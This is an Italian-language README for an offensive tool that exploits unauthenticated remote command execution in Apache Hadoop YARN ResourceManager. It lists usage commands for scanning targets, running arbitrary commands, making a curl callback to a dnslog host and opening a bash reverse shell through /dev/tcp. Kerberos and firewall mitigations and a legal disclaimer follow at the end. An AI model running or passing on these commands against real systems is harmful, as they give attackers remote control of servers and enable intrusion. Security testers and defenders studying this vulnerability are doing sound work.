
Hadoop Yan ResourceManager unauthorized RCE
Vi era una vulnerabilità di accesso non autorizzato in Hadoop Yarn ResourceManager. Questa vulnerabilità era presente in Hadoop Yarn, il componente principale di Hadoop. Poiché Hadoop Yarn esponeva il servizio RPC al pubblico per impostazione predefinita, un attaccante remoto poteva sfruttare questa vulnerabilità di accesso non autorizzato ed eseguire comandi arbitrari tramite il servizio RPC, riuscendo così a controllare il server di destinazione. Vista l'elevata pericolosità e la grande dannosità di questa vulnerabilità, e poiché i dettagli sono già stati divulgati e sfruttati da malintenzionati, si raccomanda a tutti gli utenti che utilizzano Apache Hadoop di effettuare un'autovalutazione e di adottare tempestivamente misure di sicurezza.
Apache Hadoop Yarn *
python3 Hadoop_Yan_RPC_RCE.py

python3 Hadoop_Yan_RPC_RCE.py -v true -t http://www.target.com

python3 Hadoop_Yan_RPC_RCE.py -a true -t http://www.target.com -c "curl xxx.dnslog.cn"


python3 Hadoop_Yan_RPC_RCE.py -s true -f target.txt

python3 Hadoop_Yan_RPC_RCE.py -a true -t http://www.target.com -c "bash -i >& /dev/tcp/ip/port 0>&1"

https://nosec.org/home/detail/4905.html
https://github.com/N0b1ta/Bit-Cannon/tree/master/Apache/Hadoop/YARN/hadoop-yarn-rest-api-unauth
1.Abilitare l'autenticazione Kerberos per prevenire accessi non autorizzati.
<property>
<name>hadoop.security.authentication</name>
<value>kerberos</value>
<final>false</final>
<source>core-site.xml</source>
</property>...
<property>
<name>hadoop.rpc.protection</name>
<value>authentication</value>
<final>false</final>
<source>core-default.xml</source>
</property>
2.Impedire agli indirizzi esterni di accedere alle porte relative al servizio RPC di Hadoop, oppure configurarle in modo che siano aperte solo a indirizzi attendibili.
Dichiarazione solenne: non utilizzare questo strumento per operazioni illegali. Questo strumento è utilizzato esclusivamente per l'autocontrollo di sicurezza da parte del personale della Parte A e della Parte B. Se l'utente lo utilizza illegalmente, la responsabilità legale ricadrà sull'utente!!!.